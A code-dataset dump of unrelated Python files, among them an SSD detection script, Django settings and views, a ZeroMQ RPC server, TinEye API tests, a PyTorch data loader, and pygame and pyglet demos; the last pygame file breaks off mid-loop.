{"seq_id":"645165419","text":"import argparse\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n#import cv2\nimport skimage.io\nimport skimage.draw\nfrom skimage.transform import resize\nimport chainer\nfrom chainer import serializers\n\n\nimport ssd_net\n\nlabelmap = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car',\n 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike',\n 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']\n\nparser = argparse.ArgumentParser(\n description='Learning convnet from ILSVRC2012 dataset')\nparser.add_argument('path', help='Path to training image-label list file')\nargs = parser.parse_args()\nmean = np.array([104,117,123])\nimage = skimage.img_as_float(skimage.io.imread(args.path, as_grey=False)).astype(np.float32)\n\nimg = resize(image, (300,300))\nimg = img*255 - mean[::-1]\nimg = img.transpose(2, 0, 1)[::-1]\n\nmodel = ssd_net.SSD()\nserializers.load_npz(\"ssd.model\", model)\nx = chainer.Variable(np.array([img],dtype=np.float32))\nmodel(x,1)\na=model.detection()\nplt.imshow(image)\ncurrentAxis = plt.gca()\ncolors = plt.cm.hsv(np.linspace(0, 1, 21)).tolist()\nfor i in a:\n label, conf, x1, y1, x2, y2 = i\n label = int(label) -1\n x1 = int(round(x1 * image.shape[1]))\n x2 = int(round(x2 * image.shape[1]))\n y1 = int(round(y1 * image.shape[0]))\n y2 = int(round(y2 * image.shape[0]))\n label_name = labelmap[int(label)]\n display_txt = '%s: %.2f'%(label_name, conf)\n coords = (x1, y1), x2-x1+1, y2-y1+1\n color = colors[int(label)]\n currentAxis.add_patch(plt.Rectangle(*coords, fill=False, edgecolor=color, linewidth=2))\n currentAxis.text(x1, y1, display_txt, bbox={'facecolor':color, 'alpha':0.5})\nplt.show()\n","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"622866379","text":"#-*- coding: utf-8 -*-\n\nfrom .settings_common import *\n\n# address the django container (e.g. gunicorn, cherrypy) web service listens on\nWEB_SERVER_LISTEN_ADDR = ('0.0.0.0',8000)\n\n\n\nDEBUG=True\n\n# 1. sqlite3 database\n\"\"\"\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\"\"\"\n# 2. mysql database\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'plesson',\n 'USER': 'root',\n 'PASSWORD': '123456',\n 'HOST': '127.0.0.1',\n 'PORT': '3306',\n 'CONN_MAX_AGE': 0, # keep the max connection age short; with several workers, long-lived connections can leave some workers unable to get a DB connection\n 'OPTIONS': {\n # \"init_command\": \"SET storage_engine=INNODB\",\n }\n }\n }\n\n\n\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': 'unique-snowflake',\n 'TIMEOUT': 30*60, # cache entries expire after 30 minutes\n 'OPTIONS': {\n 'MAX_ENTRIES': 1000 # not effective for memcached\n }\n },\n\n 'onedaycache': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': 'unique-snowflake2',\n 'TIMEOUT': 86400,\n 'OPTIONS': {\n 'MAX_ENTRIES': 1000\n }\n }\n}\n\n# FATAL = CRITICAL = 50 ERROR = 40 WARN = WARNING = 30 INFO = 20 DEBUG = 10 
NOTSET = 0\nLOG_LEVEL = 'INFO'\n\ndjango_sys_log_setting = {\n 'handlers': ['django_file','console'],\n 'level': LOG_LEVEL,\n 'propagate': False,\n }\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse',\n },\n 'require_debug_true': {\n '()': 'django.utils.log.RequireDebugTrue',\n },\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(asctime)s %(message)s',\n 'datefmt': '%m%d_%H:%M:%S'\n },\n 'simple': {\n 'format': '%(message)s'\n },\n },\n 'handlers': {\n 'null': {\n 'class': 'logging.NullHandler',\n },\n 'console': {\n 'level': LOG_LEVEL,\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple'\n },\n 'django_file': {\n 'level': LOG_LEVEL,\n 'class': 'logging.handlers.RotatingFileHandler',#'logging.FileHandler',\n 'filename': BASE_DIR + '/log/django.log',\n 'maxBytes' : 1024*1024*10, # 10MB\n 'backupCount' : 50,\n 'formatter': 'verbose'\n },\n 'mgr_file': {\n 'level': LOG_LEVEL,\n 'class': 'logging.handlers.RotatingFileHandler',#'logging.FileHandler',\n 'filename': BASE_DIR + '/log/mgr.log',\n 'maxBytes' : 1024*1024*10, # 10MB\n 'backupCount' : 50,\n 'formatter': 'verbose'\n },\n\n 'teacher_file': {\n 'level': LOG_LEVEL,\n 'class': 'logging.handlers.RotatingFileHandler',#'logging.FileHandler',\n 'filename': BASE_DIR + '/log/teacher.log',\n 'maxBytes' : 1024*1024*10, # 10MB\n 'backupCount' : 50,\n 'formatter': 'verbose'\n },\n\n 'student_file': {\n 'level': LOG_LEVEL,\n 'class': 'logging.handlers.RotatingFileHandler',#'logging.FileHandler',\n 'filename': BASE_DIR + '/log/student.log',\n 'maxBytes' : 1024*1024*10, # 10MB\n 'backupCount' : 50,\n 'formatter': 'verbose'\n },\n 'datamodel_file': {\n 'level': LOG_LEVEL,\n 'class': 'logging.handlers.RotatingFileHandler',#'logging.FileHandler',\n 'filename': BASE_DIR + '/log/model.log',\n 'maxBytes' : 1024*1024*10, # 10MB\n 'backupCount' : 50,\n 'formatter': 'verbose'\n },\n 'stats_file': {\n 'level': LOG_LEVEL,\n 'class': 'logging.handlers.RotatingFileHandler',#'logging.FileHandler',\n 'filename': BASE_DIR + '/log/stats.log',\n 'maxBytes' : 1024*1024*10, # 10MB\n 'backupCount' : 50,\n 'formatter': 'verbose'\n },\n 'sms_file': {\n 'level': LOG_LEVEL,\n 'class': 'logging.handlers.RotatingFileHandler',#'logging.FileHandler',\n 'filename': BASE_DIR + '/log/sms.log',\n 'maxBytes' : 1024*1024*10, # 10MB\n 'backupCount' : 50,\n 'formatter': 'verbose'\n },\n 'util_file': {\n 'level': LOG_LEVEL,\n 'class': 'logging.handlers.RotatingFileHandler',#'logging.FileHandler',\n 'filename': BASE_DIR + '/log/util.log',\n 'maxBytes' : 1024*1024*10, # 10MB\n 'backupCount' : 20,\n 'formatter': 'verbose'\n },\n },\n\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'level': LOG_LEVEL,\n },\n 'django.request': django_sys_log_setting,\n 'django.security': django_sys_log_setting,\n 'py.warnings': django_sys_log_setting,\n 'django.db.backends': django_sys_log_setting,\n\n 'mgr': {\n 'handlers': ['mgr_file','console'],\n 'level': LOG_LEVEL,\n },\n\n 'teacher': {\n 'handlers': ['teacher_file','console'],\n 'level': LOG_LEVEL,\n },\n\n 'student': {\n 'handlers': ['student_file','console'],\n 'level': LOG_LEVEL,\n },\n\n 'datamodel': {\n 'handlers': ['datamodel_file','console'],\n 'level': LOG_LEVEL,\n },\n\n 'stats': {\n 'handlers': ['stats_file'],\n 'level': LOG_LEVEL,\n },\n 'sms': {\n 'handlers': ['sms_file','console'],\n 'level': LOG_LEVEL,\n },\n 'util': {\n 'handlers': ['util_file'],\n 'level': LOG_LEVEL,\n },\n 
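# modules pick these up by name, e.g. logging.getLogger('sms').info('queued')\n # (illustrative call; the name must match one of the keys above).\n 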
}\n}","sub_path":"restapi-teach/backend/project/settings-mysql.py","file_name":"settings-mysql.py","file_ext":"py","file_size_in_byte":6063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"63655837","text":"import time\nimport hashlib\nfrom django.http import Http404\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.shortcuts import get_object_or_404\nfrom django.utils.timezone import now\nfrom zencore.django.request import get_client_ip\nfrom .models import Host\nfrom .utils import get_update_code\nfrom .utils import get_query_code\n\n\ndef update(request):\n hostname = request.GET.get(\"hostname\", \"\").upper()\n ip = request.GET.get(\"ip\", \"\")\n timestamp = request.GET.get(\"timestamp\", \"\")\n code = request.GET.get(\"code\", \"\")\n client_ip = get_client_ip(request)\n\n if (not hostname) or (not code) or (not timestamp):\n raise Http404()\n\n if abs(time.time() - int(timestamp)) > 60:\n raise Http404()\n\n host = get_object_or_404(Host, hostname=hostname)\n real_code = get_update_code(hostname, ip, timestamp, host.update_key)\n if code != real_code:\n raise Http404()\n\n host.ip = ip or client_ip\n host.update_time = now()\n host.save()\n\n return HttpResponse(\"OK\")\n\n\ndef query(request):\n hostname = request.GET.get(\"hostname\", \"\").upper()\n timestamp = request.GET.get(\"timestamp\", \"\")\n code = request.GET.get(\"code\", \"\")\n\n if (not hostname) or (not timestamp) or (not code):\n raise Http404()\n\n if abs(time.time() - int(timestamp)) > 60:\n raise Http404()\n\n host = get_object_or_404(Host, hostname=hostname)\n real_code = get_query_code(hostname, timestamp, host.update_key)\n if real_code != code:\n raise Http404()\n\n return HttpResponse(str(host.ip))\n","sub_path":"src/hostnamed/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"369350495","text":"import zmq\n\nclass Server(object):\n \"\"\"\n Will start a server that runs functions on request\n \"\"\"\n def __init__(self, url=\"127.0.0.1\", port=\"5000\"):\n # initiate\n self._context = zmq.Context()\n self.url = url\n self.port = port\n self.functions = {}\n\n def add_function(self, name, function):\n self.functions[name] = function\n\n def _exec_function(self, msg):\n \"\"\"\n msg = data object that came with message,\n should consist of:\n {\n \"id\": UniqueID,\n \"function\": \"functionkey\",\n \"args\": [],\n \"kwargs\": {},\n }\n \"\"\"\n try:\n f = self.functions[msg['function']]\n except KeyError:\n return {\n \"ID\": msg['ID'],\n 'result': None,\n 'error': 'function does not exist'\n }\n result = f(*msg['args'], **msg['kwargs'])\n\n return {\n \"ID\": msg[\"ID\"],\n \"result\": result,\n \"error\": None,\n }\n\n def _loop(self, socket):\n while 1:\n msg = socket.recv_json()\n result = self._exec_function(msg)\n socket.send_json(result)\n \n def run(self):\n \"\"\"\n runs loop,\n wraps to close socket when error\n \"\"\"\n socket = self._context.socket(zmq.PAIR)\n socket.bind(\"tcp://{url}:{port}\".format(\n url= self.url,\n port = self.port,\n )\n )\n try:\n self._loop(socket)\n except:\n socket.close()\n raise\n \n","sub_path":"zero/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"48921071","text":"import os\nfrom random import randint as rnd\n\ndef 
get(l, r):\n\treturn rnd(1, 10**10) % (r - l + 1) + l\n\ndef gen():\n\tf = open(\"input.txt\", \"w\")\n\tn = rnd(2, 5)\n\tm = rnd(2, 5)\n\tprint(n, m, file = f)\n\tfor i in range(n):\n\t\tfor j in range(m):\n\t\t\tprint(get(0, 1), end = \" \", file = f)\n\t\tprint(end = \"\\n\", file = f)\n\ndef main():\n\tfor te in range(10**6):\n\t\tgen()\n\n\t\tos.system(\"./good < input.txt > output.txt\")\n\t\tcorrect = open(\"output.txt\", \"r\").readline()\n\t\t\n\t\tos.system(\"./bad < input.txt > output.txt\")\n\t\tincorrect = open(\"output.txt\", \"r\").readline()\n\n\t\tif (incorrect != correct and (incorrect == \"-1\" or correct == \"-1\")):\n\t\t\tprint(\"WA\", te)\n\t\t\tprint(open(\"input.txt\", \"r\").read())\n\t\t\tprint(\"correct = \")\n\t\t\tprint(correct)\n\t\t\tprint(\"incorrect = \")\n\t\t\tprint(incorrect)\n\t\t\tbreak\n\t\tprint(\"OK\", te)\n\n\nmain()","sub_path":"2019/CF/71/stress.py","file_name":"stress.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"395769751","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_api_request.py\n\nTest TinEyeAPIRequest class.\n\nCopyright (c) 2015 Idée Inc. All rights reserved worldwide.\n\"\"\"\n\nfrom datetime import datetime\nimport unittest\n\nfrom pytineye.api import Backlink, Match, TinEyeResponse\nfrom pytineye.api import TinEyeAPIRequest\n\n\nclass TestTinEyeAPIRequest(unittest.TestCase):\n \"\"\" Test TinEyeAPIRequest class. \"\"\"\n\n def setUp(self):\n self.api = TinEyeAPIRequest(\n api_url='https://api.tineye.com/rest/',\n public_key='LCkn,2K7osVwkX95K4Oy',\n private_key='6mm60lsCNIB,FwOWjJqA80QZHh9BMwc-ber4u=t^')\n\n def tearDown(self):\n pass\n\n def test_backlink(self):\n \"\"\" Test TinEyeAPI.Backlink object. \"\"\"\n\n backlink = {'url': 'url', 'crawl_date': '2010-02-19', 'backlink': 'backlink'}\n b = Backlink._from_dict(backlink)\n self.assertEquals(\n repr(b),\n 'Backlink(url=\"url\", backlink=backlink, crawl_date=2010-02-19 00:00:00)')\n self.assertEquals(b.url, 'url')\n self.assertEquals(b.crawl_date, datetime(2010, 2, 19, 0, 0))\n self.assertEquals(b.backlink, 'backlink')\n\n backlink = {'url': 'url', 'crawl_date': '', 'backlink': 'backlink'}\n b = Backlink._from_dict(backlink)\n self.assertEquals(b.url, 'url')\n self.assertEquals(b.crawl_date, datetime(1, 1, 1, 0, 0))\n self.assertEquals(b.backlink, 'backlink')\n\n backlink = {'url': '', 'crawl_date': '', 'backlink': ''}\n b = Backlink._from_dict(backlink)\n self.assertEquals(b.url, '')\n self.assertEquals(b.crawl_date, datetime(1, 1, 1, 0, 0))\n self.assertEquals(b.backlink, '')\n\n backlink = {'url': None, 'crawl_date': None, 'backlink': None}\n b = Backlink._from_dict(backlink)\n self.assertEquals(b.url, None)\n self.assertEquals(b.crawl_date, datetime(1, 1, 1, 0, 0))\n self.assertEquals(b.backlink, None)\n\n def test_match(self):\n \"\"\" Test TinEyeAPI.Match object. 
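Feeds Match._from_dict raw result dicts and\n checks the attribute mapping. 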
\"\"\"\n\n match = {\n 'backlinks': [{'url': 'url', 'crawl_date': '2008-04-27', 'backlink': 'backlink'}],\n 'format': 'JPEG', 'overlay': 'overlay', 'height': 297, 'width': 350,\n 'image_url': 'image_url', 'filesize': 87918, 'contributor': False,\n 'size': 103950, 'query_hash': 'dca08fc6b2ec4b9e04f94a4e29223f6af3dd6555'}\n m = Match._from_dict(match)\n self.assertEquals(repr(m), 'Match(image_url=\"image_url\", width=350, height=297)')\n self.assertEquals(len(m.backlinks), 1)\n self.assertEquals(m.format, 'JPEG')\n self.assertEquals(m.overlay, 'overlay')\n self.assertEquals(m.height, 297)\n self.assertEquals(m.width, 350)\n self.assertEquals(m.image_url, 'image_url')\n self.assertEquals(m.filesize, 87918)\n self.assertEquals(m.contributor, False)\n self.assertEquals(m.size, 103950)\n\n match = {\n 'backlinks': [\n {'url': 'url', 'crawl_date': '2008-04-27', 'backlink': 'backlink'},\n {'url': 'url', 'crawl_date': '2009-04-27', 'backlink': 'backlink'}],\n 'format': 'JPEG', 'overlay': 'overlay', 'height': 297, 'width': 350,\n 'image_url': 'image_url', 'filesize': 87918, 'contributor': True,\n 'size': 103950}\n m = Match._from_dict(match)\n self.assertEquals(len(m.backlinks), 2)\n self.assertEquals(m.format, 'JPEG')\n self.assertEquals(m.overlay, 'overlay')\n self.assertEquals(m.height, 297)\n self.assertEquals(m.width, 350)\n self.assertEquals(m.image_url, 'image_url')\n self.assertEquals(m.filesize, 87918)\n self.assertEquals(m.contributor, True)\n self.assertEquals(m.size, 103950)\n\n match = {\n 'backlinks': [],\n 'format': '', 'overlay': '',\n 'image_url': 'image_url', 'filesize': 87918, 'contributor': True,\n 'size': 103950}\n m = Match._from_dict(match)\n self.assertEquals(len(m.backlinks), 0)\n self.assertEquals(m.format, '')\n self.assertEquals(m.overlay, '')\n self.assertEquals(m.height, None)\n self.assertEquals(m.width, None)\n self.assertEquals(m.image_url, 'image_url')\n self.assertEquals(m.filesize, 87918)\n self.assertEquals(m.contributor, True)\n self.assertEquals(m.size, 103950)\n\n def test_tineye_response(self):\n \"\"\" Test TinEyeAPI.TinEyeResponse object. \"\"\"\n\n matches = {\n 'results': {\n 'matches': [\n {\n 'backlinks': [],\n 'format': '',\n 'overlay': '',\n 'height': 297,\n 'width': 350,\n 'image_url': '',\n 'filesize': 87918,\n 'contributor': True,\n 'size': 103950\n }\n ]\n }\n }\n r = TinEyeResponse._from_dict(matches)\n self.assertEquals(\n repr(r),\n 'TinEyeResponse(matches=\"[Match(image_url=\"\", width=350, height=297)]\", total_results=0)'),\n self.assertEquals(len(r.matches), 1)\n self.assertEquals(r.matches[0].height, 297)\n self.assertEquals(r.matches[0].width, 350)\n\n matches = {\n 'results': {\n 'matches': [\n {\n 'backlinks': [],\n 'format': '',\n 'overlay': '',\n 'height': 297,\n 'width': 350,\n 'image_url': '',\n 'filesize': 87918,\n 'contributor': True,\n 'size': 103950\n },\n {\n 'backlinks': [],\n 'format': '',\n 'overlay': '',\n 'height': 200,\n 'width': 300,\n 'image_url': '',\n 'filesize': 87918,\n 'contributor': True,\n 'size': 103950\n }\n ]\n }\n }\n r = TinEyeResponse._from_dict(matches)\n self.assertEquals(len(r.matches), 2)\n self.assertEquals(r.matches[1].height, 200)\n self.assertEquals(r.matches[1].width, 300)\n\n matches = {'results': {'matches': []}}\n r = TinEyeResponse._from_dict(matches)\n self.assertEquals(len(r.matches), 0)\n\n def test_calls(self):\n \"\"\" Test methods with API sandbox. 
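Exercises search_url, search_data,\n remaining_searches and image_count against the sandbox keys from setUp. 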
\"\"\"\n\n # Test search_url with sandbox\n response = self.api.search_url('http://www.tineye.com/images/meloncat.jpg')\n self.assertEqual(len(response.matches), 100)\n self.assertTrue(response.total_results > 1000)\n\n response = self.api.search_url('http://www.tineye.com/images/meloncat.jpg', limit=10)\n self.assertEqual(len(response.matches), 10)\n self.assertTrue(response.total_results > 1000)\n\n # Test search_data with sandbox\n filename = \"test/images/meloncat.jpg\"\n data = \"\"\n with open(filename, 'rb') as fp:\n data = fp.read()\n response = self.api.search_data(data)\n self.assertEqual(len(response.matches), 100)\n self.assertTrue(response.total_results > 1000)\n\n response = self.api.search_data(data, limit=10)\n self.assertEqual(len(response.matches), 10)\n self.assertTrue(response.total_results > 1000)\n\n # Test remaining_searches with sandbox\n remaining_searches = self.api.remaining_searches()\n self.assertEqual(remaining_searches['remaining_searches'], 5000)\n self.assertTrue('start_date' in remaining_searches)\n self.assertTrue('expire_date' in remaining_searches)\n self.assertTrue(isinstance(remaining_searches['start_date'], datetime))\n self.assertTrue(isinstance(remaining_searches['expire_date'], datetime))\n\n # Test image_count with sandbox\n image_count = self.api.image_count()\n self.assertTrue(image_count > 10000000000)\n\n def test_total_results_in_response(self):\n \"\"\" Test if TinEyeAPI.TinEyeResponse contains total_results. \"\"\"\n\n response = {\n 'results': {'total_results': 123, 'matches': []}\n }\n r = TinEyeResponse._from_dict(response)\n self.assertEqual(r.total_results, 123)\n","sub_path":"test/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"117721883","text":"class Solution(object):\r\n def addBinary(self, a, b):\r\n \"\"\"\r\n :type a: str\r\n :type b: str\r\n :rtype: str\r\n \"\"\"\r\n if a == \"\" or b == \"\":\r\n return \"\"\r\n \r\n int_a = self.toInt(a)\r\n int_b = self.toInt(b)\r\n return bin(int_a + int_b)[2:]\r\n \r\n def toInt(self, binary):\r\n decimal = 0\r\n for i in binary:\r\n decimal = decimal * 2 + int(i)\r\n return decimal\r\n \r\n##################################################\r\n\"\"\"\r\nhttps://leetcode.com/discuss/47330/one-line-python-solution\r\n\"\"\"\r\nclass Solution(object):\r\n def addBinary(self, a, b):\r\n return bin(int(a,2) + int(b,2))[2:]\r\n # or: bin(eval('0b'+a+'+0b'+b))[2:]","sub_path":"src/067_AddBinary.py","file_name":"067_AddBinary.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"517085872","text":"import numpy as np\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\n\nclass MyDataLoader(DataLoader):\n def __init__(self, dataset, batch_size, shuffle, num_workers, validation_split=0.0, validation_idx=None):\n self.validation_split = validation_split\n self.validation_idx = validation_idx\n self.shuffle = shuffle\n self.n_samples = len(dataset)\n self.sampler, self.valid_sampler = self._split_sampler(self.validation_split, self.validation_idx)\n\n self.init_kwargs = {\n 'dataset': dataset,\n 'batch_size': batch_size,\n 'shuffle': self.shuffle,\n 'num_workers': num_workers\n }\n super(MyDataLoader, self).__init__(sampler=self.sampler, **self.init_kwargs)\n\n def _split_sampler(self, validation_split, validation_idx):\n if 
(validation_split == 0.0) and (validation_idx is None):\n return None, None\n\n idx_full = np.arange(self.n_samples)\n if validation_idx is None:\n np.random.seed(0)\n np.random.shuffle(idx_full)\n\n len_valid = int(self.n_samples * validation_split)\n\n valid_idx = idx_full[0:len_valid]\n train_idx = np.delete(idx_full, np.arange(0, len_valid))\n else:\n # if validation_idx is provided, validation_split is ignored\n valid_idx = validation_idx\n train_idx = np.delete(idx_full, valid_idx)\n\n train_sampler = SubsetRandomSampler(train_idx)\n valid_sampler = SubsetRandomSampler(valid_idx)\n\n # turn off shuffle option which is mutually exclusive with sampler\n self.shuffle = False\n self.n_samples = len(train_idx)\n\n return train_sampler, valid_sampler\n\n def split_validation(self):\n if self.valid_sampler is None:\n return None\n else:\n print(\"Number of training data: %d\" % len(self.sampler.indices))\n print(\"Number of validation data: %d\" % len(self.valid_sampler.indices))\n return DataLoader(sampler=self.valid_sampler, **self.init_kwargs)\n","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"108888262","text":"_base_ = [\n '../_base_/models/vit-base-p16.py',\n '../_base_/datasets/imagenet_bs64_pil_resize.py',\n '../_base_/schedules/imagenet_bs4096_AdamW.py',\n '../_base_/default_runtime.py'\n]\n\n# model setting\nmodel = dict(backbone=dict(pre_norm=True))\n\n# data settings\ntrain_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(\n type='RandomResizedCrop',\n scale=448,\n backend='pillow',\n interpolation='bicubic'),\n dict(type='RandomFlip', prob=0.5, direction='horizontal'),\n dict(type='PackInputs'),\n]\n\ntest_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(\n type='ResizeEdge',\n scale=448,\n edge='short',\n backend='pillow',\n interpolation='bicubic'),\n dict(type='CenterCrop', crop_size=448),\n dict(type='PackInputs'),\n]\n\ntrain_dataloader = dict(dataset=dict(pipeline=train_pipeline))\nval_dataloader = dict(dataset=dict(pipeline=test_pipeline))\ntest_dataloader = dict(dataset=dict(pipeline=test_pipeline))\n\n# schedule setting\noptim_wrapper = dict(clip_grad=dict(max_norm=1.0))\n","sub_path":"configs/clip/vit-base-p16_pt-64xb64_in1k-448px.py","file_name":"vit-base-p16_pt-64xb64_in1k-448px.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"558246741","text":"from math import *\nfrom pyglet.gl import *\nimport random\nimport time\n\n#count = 0\n#t0 = 0\n#t1 = 0\n#t2 = 0\n#t3 = 0\n\nCIRCLES = 500\nNUM_POINTS = 40\n\ncos_value = [cos(radians(float(i)/NUM_POINTS * 360)) for i in range(NUM_POINTS)]\nsin_value = [sin(radians(float(i)/NUM_POINTS * 360)) for i in range(NUM_POINTS)]\n\nclass Circle():\n\n def __init__(self, center_x, center_y, radius, color, batch):\n # first get all verteces of the circle\n self.center = (center_x, center_y)\n self.radius = radius\n vertices = self._pos_vertices()\n self.num_verts = len(vertices) // 2\n colors = self._color_vertices(color)\n self.vertex_list = batch.add(self.num_verts, pyglet.gl.GL_TRIANGLE_STRIP, None,\n ('v2f', vertices),\n ('c3B', colors))\n\n def _pos_vertices(self):\n #global t2, t3\n x = (self.radius*cos_value[i] + self.center[0] for i in range(NUM_POINTS))\n y = (self.radius*sin_value[i] + self.center[1] for i in range(NUM_POINTS))\n #t22 = time.time()\n circle_verts = 
list(zip(x,y))\n #t2 += time.time() - t22\n #t33 = time.time()\n verts = list()\n verts.extend(2 * (self.center[0], self.center[1]))\n for v1, v2 in zip(circle_verts[0:-1:2], circle_verts[1::2]):\n verts += v1\n verts += v2\n verts += (self.center[0], self.center[1])\n verts.extend(2 * circle_verts[0])\n #t3 += time.time() - t33\n return verts\n\n def _color_vertices(self, color):\n colors = self.num_verts * color\n return colors\n\n def set_position(self, x, y):\n #global t0, t1\n #t00 = time.time()\n self.center = (x, y)\n new_verts = self._pos_vertices()\n #t0 += time.time() - t00\n #t11 = time.time()\n self.vertex_list.vertices = new_verts\n #t1 += time.time() - t11\n\n def delete(self):\n self.vertex_list.delete()\n\n\nif __name__ == \"__main__\":\n\n window = pyglet.window.Window(800, 600)\n batch = pyglet.graphics.Batch()\n\n def makeCircles(number, center_x, center_y, radius, batch):\n color = (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))\n circles = []\n for i in range(number):\n circles.append(Circle(random.randint(0,800), random.randint(0,600), radius, color, batch))\n return circles\n\n circles = makeCircles(CIRCLES, random.randint(0,800), random.randint(0,600), 20, batch)\n\n @window.event\n def on_draw():\n glClear(pyglet.gl.GL_COLOR_BUFFER_BIT)\n batch.draw()\n\n #GL_TRIANGLE_STRIP global count, t0, t1, t2, t3\n #count += 1\n #if count % 10 == 0:\n # print('------------------------------------')\n # print(\"CALC \", t0)\n # print(\"ADD VERT\", t1)\n # print(\"VERT 1 \", t2)\n # print(\"VERT 2 \", t3)\n # t0 = 0\n # t1 = 0\n # t2 = 0\n # t3 = 0\n fps_display.draw()\n\n fps_display = pyglet.clock.ClockDisplay()\n\n def update(dt):\n for circle in circles:\n circle.set_position(random.randint(0,800), random.randint(0,600))\n\n pyglet.clock.schedule_interval(update, 0.01)\n\n pyglet.app.run()\n","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"432755077","text":"import pygame\nfrom pygame.locals import *\nfrom sys import exit\nimport random\n\n\nbranco = (255, 255, 255)\nxr = 1200\nyr = random.randint(0, 200)\nxr2 = 1600\nyr2 = random.randint(0, 200)\nxr3 = 2000\nyr3 = random.randint(0, 200) \n\nbackground_image_filename = 'img/Noite.png' \ncorrendo_image_filename = 'img/Correndo.png' \npulando_image_filename = 'img/Pulando.png' \ninimigo1_image_filename = 'img/Inimigo1.png' \ninimigo2_image_filename = 'img/Inimigo2.png' \nbala_image_filename = 'img/Bala.png' \n\n\n\npygame.init()\n\nscreen = pygame.display.set_mode((800, 380), 0, 32)\nclock = pygame.time.Clock()\nbackground = pygame.image.load(background_image_filename).convert()\nbackground2 = pygame.image.load(background_image_filename).convert()\ncorrendo = pygame.image.load(correndo_image_filename).convert()\npulando = pygame.image.load(pulando_image_filename).convert()\ninimigo1 = pygame.image.load(inimigo1_image_filename).convert()\ninimigo2 = pygame.image.load(inimigo2_image_filename).convert()\nbala1 = pygame.image.load(bala_image_filename).convert()\nbala2 = pygame.image.load(bala_image_filename).convert()\npersonagem = correndo\n\n\nbx = 0\nbx2 = 801\nx = 0\ny = 325\nxi1 = 710\nxi2 = 710\nyi1 = 100\nyi2 = y\nxb1 = 700\nxb2 = 700\nyb1 = yi1\nyb2 = yi2\nsubir = 0\nz = 0\na = 4\n\nwhile True:\n\n for event in pygame.event.get(): \n if event.type == QUIT:\n pygame.quit()\n exit()\n\n if event.type == KEYDOWN and subir == 0:\n if event.key==K_SPACE:\n subir = 
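The `draw.py` record precomputes `cos_value`/`sin_value` once at import time so that rebuilding 500 circle vertex lists per frame does no trigonometry. The trick in isolation, without the pyglet batch machinery:

```python
# Standalone version of the lookup-table trick in draw.py: evaluate cos/sin
# once per angle step, then every circle reuses the tables.
from math import cos, sin, radians

NUM_POINTS = 40
COS = [cos(radians(i / NUM_POINTS * 360)) for i in range(NUM_POINTS)]
SIN = [sin(radians(i / NUM_POINTS * 360)) for i in range(NUM_POINTS)]

def circle_vertices(cx: float, cy: float, r: float) -> list:
    # One (x, y) pair per precomputed angle; no trig calls in the hot path.
    return [(r * COS[i] + cx, r * SIN[i] + cy) for i in range(NUM_POINTS)]

if __name__ == "__main__":
    verts = circle_vertices(400.0, 300.0, 20.0)
    print(len(verts), "vertices, first:", verts[0])
```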
